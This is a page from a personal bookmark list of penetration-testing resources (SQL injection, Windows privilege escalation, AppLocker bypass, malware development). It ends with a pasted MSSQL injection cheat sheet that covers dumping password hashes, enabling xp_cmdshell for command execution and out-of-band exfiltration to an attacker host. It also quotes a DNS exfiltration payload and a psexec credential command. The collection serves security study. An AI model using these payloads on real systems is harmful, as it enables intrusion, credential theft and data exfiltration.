784 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 36 / 40
Newer►
  • thumbnail
    Using cURL to authenticate with JWT Bearer tokens – Niel de Wet – Medium
    June 4, 2019 at 11:54:14 AM UTC - permalink -
    QRCode
    - https://medium.com/@nieldw/using-curl-to-authenticate-with-jwt-bearer-tokens-55b7fac506bd
    json web token jwt auth authentication authorization bearer http login node nodejs express curl tokens
  • thumbnail
    How to Get a Windows XP Download Free From Microsoft, Legally
    June 3, 2019 at 6:51:57 PM UTC - permalink -
    QRCode
    - https://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/
    windows xp download vm virtual machine legal free
  • thumbnail
    PWK/OSCP – Stack Buffer Overflow Practice – vortex's blog
    June 3, 2019 at 10:12:51 AM UTC - permalink -
    QRCode
    - https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
    buffer overflow slmail vulnserver oscp hacking pentest download bof bo
  • thumbnail
    AppLocker Bypass – MSBuild | Penetration Testing Lab
    June 3, 2019 at 10:01:26 AM UTC - permalink -
    QRCode
    - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
    byass applocker msbuild hacking pentest windows policies
  • thumbnail
    SMB Share – SCF File Attacks | Penetration Testing Lab
    June 3, 2019 at 10:00:47 AM UTC - permalink -
    QRCode
    - https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
    smb hacking pentest scf hash ntlm relay responder share windows
  • Exploiting encrypted cookies for fun and profit
    May 16, 2019 at 11:44:03 AM UTC * - permalink -
    QRCode
    - https://spring.io/blog/2014/01/20/exploiting-encrypted-cookies-for-fun-and-profit
    crypto aes 128 cbc hacking pentest cookie encryption decryption
  • thumbnail
    41397-injecting-sqlite-database-based-applications.pdf
    May 13, 2019 at 9:27:09 AM UTC - permalink -
    QRCode
    - https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf
    sqlinjection sql injection payload hacking pentest cheatsheet sqlite
  • thumbnail
    DNS Data exfiltration through SQL injection
    UNION SELECT LOAD_FILE(concat('\\\\', SELECT version(), '.35bb69cb2c1eeda31ab8.d.requestbin.net'));
    May 9, 2019 at 1:34:22 PM UTC - permalink -
    QRCode
    - https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf
    sql injection hacking pentest out of band out-of-band load_file load file dns request.bin data exfiltration
  • thumbnail
    The SQL Injection Knowledge Base
    May 7, 2019 at 10:49:29 AM UTC - permalink -
    QRCode
    - https://websec.ca/kb/sql_injection
    sql injection cheatsheet hacking pentest
  • thumbnail
    Malware Development – Welcome to the Dark Side: Part 1 - Checkmate
    May 1, 2019 at 3:48:40 PM UTC - permalink -
    QRCode
    - https://niiconsulting.com/checkmate/2018/02/malware-development-welcome-dark-side-part-1/
    hacking pentest malware dev howto
  • thumbnail
    GitHub - ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
    April 30, 2019 at 2:23:17 PM UTC - permalink -
    QRCode
    - https://github.com/ambionics/phpggc
    github tool phpgcc php serialized unserialized payload serialization hacking pentest
  • thumbnail
    APT MiTM Package Injection | How to Perform a MiTM attack against APT
    April 30, 2019 at 9:57:43 AM UTC - permalink -
    QRCode
    - https://versprite.com/blog/apt-mitm-package-injection/
    package injection apt apt-get hacking pentest mitm
  • thumbnail
    BloodHound with Kali Linux: 101 - Red Teaming Experiments
    April 3, 2019 at 11:54:50 AM UTC - permalink -
    QRCode
    - https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux
    bloodhound windows hacking penstest active directory ad exploitation mapping ldap sharphound
  • thumbnail
    PHP security exploit - list content of remote PHP file? - Stack Overflow
    April 1, 2019 at 11:29:13 PM UTC * - permalink -
    QRCode
    - https://stackoverflow.com/questions/20726247/php-security-exploit-list-content-of-remote-php-file
    php lfi wrapper include data type hacking pentest exploitation
  • thumbnail
    A Virgil's Guide to Pentest: Escalation Time
    March 31, 2019 at 7:17:11 PM UTC - permalink -
    QRCode
    - http://virgil-cj.blogspot.com/2018/02/escalation-time.html
    windows hacking pentest post exploitation guide howto
  • thumbnail
    PowerUp: A Usage Guide – harmj0y
    March 31, 2019 at 7:04:32 PM UTC - permalink -
    QRCode
    - https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
    powerup powershell windows exploitation post hacking pentest
  • thumbnail
    Using Credentials to Own Windows Boxes (from Kali)

    psexec.py 'DOMAIN\user:passw0rd1!'@10.10.10.10

    March 31, 2019 at 7:03:07 PM UTC - permalink -
    QRCode
    - https://blog.ropnop.com/using-credentials-to-own-windows-boxes/
    psexec smb windows hacking post exploitation revshell
  • thumbnail
    Windows Privilege Escalation Guide

    Script https://github.com/absolomb/WindowsEnum

    March 30, 2019 at 2:51:49 PM UTC - permalink -
    QRCode
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    windows privilege escalation guide post hacking pentest
  • thumbnail
    MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC - permalink -
    QRCode
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • thumbnail
    SQL Injection Cheat Sheet: MSSQL — GracefulSecurity
    Version
    SELECT @@version;
    SELECT @@VERSION LIKE '%2008%';
    
    User details
    SELECT user;
    SELECT current_user;
    SELECT SYSTEM_USER;
    SELECT USER_NAME();
    SELECT USER_NAME(2);
    SELECT SUSER_SNAME();
    SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
    SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
    
    Database details
    SELECT DB_NAME();
    SELECT DB_NAME(5);
    SELECT name FROM master..sysdatabases;
    
    Database credentials
    SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;
    
    Server details
    SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');
    
    Table Names
    SELECT name FROM master..sysobjects WHERE xtype='U';
    SELECT table_name FROM information_schema.tables;
    
    Columns Names
    SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
    SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
    
    No Quotes
    SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;
    
    String Concatenation
    SELECT CONCAT('a','a','a');
    SELECT 'a' %2b 'b' %2b 'c' %2b 'd';
    
    Conditionals
    IF 1=1 SELECT 'true' ELSE SELECT 'false';
    SELECT CASE WHEN 1=1 THEN true ELSE false END;
    
    Time-delay
    WAITFOR DELAY 'time_to_pass';
    WAITFOR TIME 'time_to_execute';
    
    Enable Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell', 1;
    EXEC sp_configure reconfigure;
    
    Command Execution
    EXEC master.dbo.xp_cmdshell 'cmd';
    
    Enable Alternative Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'OLE Automation Procedures', 1;
    EXEC sp_configure reconfigure;
    
    Alternative Command Execution
    DECLARE @execmd INT;
    EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
    EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';
    
    "RunAs"
    SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
    EXECUTE AS USER = 'FooUser';
    
    Read Files
    BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );
    
    Out-of-Band Retrieval
    ;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  
    
    Substrings
    SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
    ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;
    
    Retrieve Nth Line
    SELECT TOP 1 table_name FROM information_schema.tables;
    SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC - permalink -
    QRCode
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest
Links per page: 20 50 100
◄Older
page 36 / 40
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation